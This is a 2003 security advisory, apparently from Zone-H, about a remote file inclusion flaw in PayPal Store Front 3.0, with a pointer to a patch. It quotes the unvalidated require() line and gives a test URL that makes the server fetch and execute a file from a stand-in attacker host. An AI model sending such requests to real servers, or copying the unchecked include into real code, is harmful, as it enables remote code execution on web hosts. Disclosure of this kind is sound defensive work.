ZH2003-28SA (security advisory): file inclusion vulnerability in PayPal Store Front

2003-10-08T00:00:00
ID SECURITYVULNS:DOC:5226
Type securityvulns
Reporter Securityvulns
Modified 2003-10-08T00:00:00

Description

ZH2003-28SA (security advisory): file inclusion vulnerability in PayPal Store Front

Published: 08 October 2003 Name: PayPal Store Front Affected Versions: 3.0 (and other versions?) Vendor: http://www.muziqpakistan.net/~taz/ Issue: file inclusion vulnerability Author: Astharot (at Zone-H.org)

Description


Zone-H Security Team has discovered a flaw in PayPal Store Front v3.0 (and other versions?), commercial and free version. PayPal Store Front "is created for small to medium size companies who want to sell products online, but is not limited to it. Any one, who has something to sell, can use this Cart System to sell.".

Details


There's a file inclusion vulnerability in the index.php file:

require ($page . ".php");

Is it possible for a remote attacker to include an external file and execute arbitrary commands with the privileges of the webserver (nobody by default).

To test the vulnerability try this:

http://www.vulnsite.com/index.php?do=ext&page=http://www.attacker.com/index

In this way the file "http://www.attacker.com/index.php" will be included and executed on the server.

Solution


It's possible to download a simple patch for the free version of PayPal Store Front here: http://www.zone-h.org/download/file=4957.

However, the author has been contacted.

Suggestions


Use the proposed patch.

To install the patch type:

patch < paypal.diff

in the paypal directory.


Astharot - Zone-H Admin

Original advisory here: http://www.zone-h.org/en/advisories/read/id=3231/

-- http://www.zone-h.org - astharot@zone-h.org PGP Key: http://www.gife.org/astharot.asc

Linux User #292132